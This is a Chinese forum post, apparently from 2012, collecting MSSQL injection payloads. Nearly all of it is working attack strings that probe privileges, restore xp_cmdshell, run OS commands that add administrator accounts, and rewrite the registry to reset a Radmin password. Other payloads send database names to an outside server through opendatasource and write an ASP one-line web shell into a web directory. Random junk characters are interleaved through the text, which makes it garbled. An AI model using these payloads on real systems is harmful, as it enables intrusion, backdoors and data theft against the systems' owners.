//看看是什么权限的/ Y% s% w6 l' d E' \3 f
and 1=(Select IS_MEMBER('db_owner'))- D' q [( j8 @* R# r
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 z0 ]: r5 _$ |" f4 o, X$ y
{; `0 r" I; s9 p4 ~//检测是否有读取某数据库的权限
& n }3 l! E+ \9 Rand 1= (Select HAS_DBACCESS('master'))
q7 u- d' J* b. x, n& ^2 D5 z' MAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
. O0 |7 d7 j' |: a1 u* ~6 `4 G6 \! c( ?( a# X7 v4 b7 k' n
: W! o }1 N3 j9 l数字类型
, L9 A- {# g3 \8 gand char(124)%2Buser%2Bchar(124)=0
" r* w- q* D. |7 _8 }3 J3 C: ?0 {' U/ r
字符类型
4 j+ l" b1 y( _! l' and char(124)%2Buser%2Bchar(124)=0 and ''='
6 j! f& e8 G, s# u; u% ?/ ^8 a$ |8 D1 ]9 O5 d5 u: ^
搜索类型
4 g$ }5 g) [3 o8 X/ c. I$ N' C' and char(124)%2Buser%2Bchar(124)=0 and '%'='
# u0 r8 j/ ]' A+ V$ Y. D) x' [4 T: ?# M% L* P7 [/ n- ^/ p* R" u
爆用户名
# s2 Q$ H8 s: I! N. J) d8 d- ~2 ~and user>06 Y. o( A3 y Z
' and user>0 and ''='
/ N, D" T8 F: f" W" N J0 U
! A5 x5 k: q, f/ G# i4 Y8 o3 I) P检测是否为SA权限- Q. f. | |, I' [1 H$ ]
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
' A8 i; m5 ?6 d6 k! U2 rAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --3 x' i- M# a! z' f9 ^& \
7 @0 F4 H4 \7 z$ x
检测是不是MSSQL数据库% N1 R" Z# q: T
and exists (select * from sysobjects);--
, Q I( d7 W6 U: o P E/ c. U# }/ B( U) O( C/ F+ t+ f8 q5 A
检测是否支持多行
/ T9 c" J$ n3 q) |. j$ P;declare @d int;--8 ]' X2 e" t& R# b! R
% b1 { R: l3 H' k1 r9 z( s
恢复 xp_cmdshell; M7 H6 b; p3 `6 T3 r8 c
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
; s" `8 O8 j+ m- P; e4 K4 h1 W
5 D' h# z. u7 r$ J; q/ [/ X$ h5 N7 l1 J- j) E6 \ P% p: H9 r8 X8 x
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')0 v+ D- n5 |1 Y; m
" K) g5 c. Z. {9 d
//-----------------------' n1 G! j2 E# t! N: B& T7 T
// 执行命令
1 H) k. ?0 \. a//-----------------------
% @" Q! m- w ?* h, o; O首先开启沙盘模式:7 q$ P2 [, g0 y, ] Q
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, K& T+ j4 u( i( S
7 B- d6 n) t" m+ {. p% Q: t5 X- u
然后利用jet.oledb执行系统命令5 C) [. X* y, `% Z6 W, l* Y
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')3 w1 @7 w% \. ?
7 b0 l2 W j0 n6 O+ `. J
执行命令
- e) b- J( [* g% h' R;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
$ N3 S @, F% z# d9 l( d
' n9 h; M$ D2 c- uEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'% j7 J! H& Z$ a: H y' b* a
! i4 p( s; a" `$ U' o2 N4 p, Y
判断xp_cmdshell扩展存储过程是否存在:
2 `+ I; X& h7 ~+ R* P3 khttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
- C) x& S- M) N7 a" m x- J$ ^7 w! C8 }2 G8 z2 F
写注册表
% ~! ^; m! Y& r8 [" E) }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',10 }0 P6 N# Z2 p0 O8 \# ^
+ @* H3 E1 u- b8 R0 o% y
REG_SZ
" B6 J# w- ^; ]2 M. ]& r: y* h( K5 ]9 k2 Z' S$ X- `2 o* }7 h' }
读注册表4 W3 K) ~$ ]2 K' l D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'0 r5 R! T& W0 q7 V
" d9 h* x3 \) e' z( H# s
读取目录内容; L' C6 i3 e8 R' I4 Y
exec master..xp_dirtree 'c:\winnt\system32\',1,1: e3 i% k" {" M- ~1 H9 O( l" R
8 p. R$ v( m) @; f; E
0 g) g ?) n; u# ~0 x) C数据库备份
9 D' W% G* b" n' i: n) \- i$ s/ pbackup database pubs to disk = 'c:\123.bak'
+ r4 s9 R2 k& x6 |
" ~7 z* M$ N0 A% E3 V//爆出长度
+ Y3 Q/ z: t aAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--, d& l0 \# w5 n/ d
1 A* g6 X. B2 r, J3 {% x
) \; Y1 z2 A! ^/ z4 h7 |# {+ G
/ l* R! |( e, i% Y5 X更改sa口令方法:用sql综合利用工具连接后,执行命令:
* y3 V/ O6 J4 {( Xexec sp_password NULL,'新密码','sa'
% i1 ~0 e [5 Y k) p
& ~7 v0 d/ E( c8 Z: U7 f( W8 o+ J) P添加和删除一个SA权限的用户test:5 f+ P% m3 u% x% o$ m
exec master.dbo.sp_addlogin test,9530772
1 M6 l: {" b$ `6 r) u. h `) Z/ }exec master.dbo.sp_addsrvrolemember test,sysadmin7 a$ }1 \5 ~, I) \. \; P, J
S% R8 q1 g1 M4 y& X6 s
删除扩展存储过过程xp_cmdshell的语句:, Y' Z s8 i/ Z* k/ x9 I
exec sp_dropextendedproc 'xp_cmdshell'' G) l0 j* ^- w- O3 S' d s
5 N' L! q7 J5 Q
添加扩展存储过过程
8 J/ S( ~# a; T ]5 gEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
! r+ B C! R" }/ OGRANT exec On xp_proxiedadata TO public$ h8 y8 H4 O6 Z" i- W
, J; Q1 J' a. f5 [
5 l/ {& o2 A/ a停掉或激活某个服务。
6 C$ E0 d+ k2 C
9 r. X5 v+ w0 H+ l/ Lexec master..xp_servicecontrol 'stop','schedule'
" w" g; i* X+ A) b9 i( i2 m! qexec master..xp_servicecontrol 'start','schedule'
6 Y& A0 y3 \4 S' Z% K, u- E2 t3 w* \
dbo.xp_subdirs
3 B! q4 A$ f/ O$ O; c% f* a$ u0 i3 z
$ G, w0 `3 h& ~3 B/ m只列某个目录下的子目录。( M0 y% g9 G" l' S0 S) {
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'# F7 |3 ~; ^ c% ]2 |( J: F4 d
" E4 g! c$ M/ v" c$ R0 pdbo.xp_makecab( U! g. }! i7 L: q4 V. P3 @: A1 J
5 U, H! U. Y+ C2 g7 b' q+ x/ J将目标多个档案压缩到某个目标档案之内。' O& {& W; c! |3 m* O4 \
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
) _, H0 N6 K5 r" f3 S% G0 x( A4 x* d) M1 n- Z
dbo.xp_makecab- f6 d- _/ B- }/ y% e3 B6 S
'c:\test.cab','mszip',1,) _# k# V* a- H$ s; s7 m! L6 M; w
'C:\Inetpub\wwwroot\SQLInject\login.asp',0 Z3 o% |1 t$ g: J; }( O0 f
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'3 u6 m$ N1 J7 k
3 y# S, M" `& cxp_terminate_process
* T' k( K t3 Y! d" e% p% N# x% m3 W# }, Z4 i4 H
停掉某个执行中的程序,但赋予的参数是 Process ID。$ B7 J9 l/ J; b* w6 Q# `4 j. N- B
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
, O5 j: }. P" {- |: q4 E' m# t& _/ [* i
xp_terminate_process 2484
! Q$ v M' f& p2 w- F$ i3 u
7 s( c7 y1 ?4 Y9 q, w& a% \" sxp_unpackcab
$ h/ K: A% m4 C7 i) N: O9 [. J$ X* E' \5 O' _
解开压缩档。
: U% ^/ U; e7 ]4 e4 T- x
) U7 n! @. b* C5 Y5 ?xp_unpackcab 'c:\test.cab','c:\temp',1( R: t8 Z, k+ X' B1 q
# F0 u- Q8 x6 h0 z
) ]3 c5 M6 _% Z3 k% D# f& C某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
9 g! x6 u% |: h8 x1 y/ B7 A: F* y7 S6 M2 S" c
create database lcx;* D' r! b& i* M+ N
Create TABLE ku(name nvarchar(256) null); N' [) f" S, a+ o- b3 ?
Create TABLE biao(id int NULL,name nvarchar(256) null);
6 P0 d" W* z; t) O# I6 P9 }8 S: W" i2 K& k1 } M/ Y# M* m+ Y
//得到数据库名
9 g* C& ]8 t7 L) E5 f# y e/ \insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
8 f/ A P7 Z! V& e/ g+ K& @" b, A9 R: v+ b, M2 |/ W3 ?
( C" U) w ^1 h; J0 b//在Master中创建表,看看权限怎样6 f" j) X g1 u0 c% p
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--0 c1 @* J) T, S
* W* r$ J$ E2 t) G& q; q: S/ Z用 sp_makewebtask直接在web目录里写入一句话马:- G! f/ L, u- D* Z' `& T$ t& N8 O# W0 g
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
' O: r+ d. L* K3 `& x6 k
: ?3 M6 [6 |/ o, Z//更新表内容
( z6 e, u5 j+ o5 oUpdate films SET kind = 'Dramatic' Where id = 123
. }: j6 m4 `! j' j) _' i6 H5 e) v
" ^; J: E! e7 A: w//删除内容
, |: _ A' z) W* T9 v/ K8 _5 I6 {delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对